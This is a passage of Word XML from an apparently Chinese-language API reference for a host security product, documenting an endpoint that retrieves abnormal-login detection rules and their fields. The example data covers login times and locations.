    <w:p w14:paraId="3708A598" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abnormallogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rule/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C594FA"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630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="854"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="154D623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3F13613" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07B46F64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="302205CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24456556" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B0AFF4D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54BEC1BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="351B21A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CE649F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59B0B48A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FF11FC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C602C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/abnormallogin/linux/rule/5a5dceb83171a7202baafae4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E233C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE9312F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5a9d026a7d761b3ccfcf2c3d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmKind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmAgentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmAgentGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "condition": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginIps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginTimes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "start": "08:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "end": "10:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startMinutes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 480,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>endMinutes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 600,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "weeks": [1, 2, 3 ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginLocations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "country": "中国",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "province": "北京",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "city": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>combineType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>combineTypeAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10C2DA"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925"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3634"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A6C6AD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10FD288" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="270C5AC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2002BCE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24152656" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0B83817F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C4C6DEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B216460" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B14A3D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61DD8D53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="78F58819" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F0B9E88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BCDA67E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B78F681" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A959EB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">系统类型，1:linux </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>2:windows</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="70FD7818" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E730FD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F3335D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AA4923C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="668AAC36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机范围:0-全部主机;1-主机 2-业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="579B5309" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46F520D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44F89B36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="106743AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="649C349D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=2, 该字段有值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EFE5158" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CCD5E9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmAgentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DB32E15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DFBCA74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F926A22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 该字段有值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2662B4F8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D83A99B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmAgentGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F0E9D43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EB3FA38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4992F8E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机所在业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E8B5CCD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33C550C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33B8D575" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54E1CA4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="751B2C9C" w14:textId="704D4A9C" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则详情，参见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "condition数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>condition数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3373EF54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="283" w:name="condition数据结构"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>condition数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1745"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="3792"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C6EFC1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1B12E9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05558F8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E710A9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11B0F335" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="70587EBA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C8DA69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginIps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C6FDDDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A9F3A74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="299265CF" w14:textId="60342859" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录IP，参见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "loginips数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>loginIps数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="08F29728" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E029F2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginTimes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
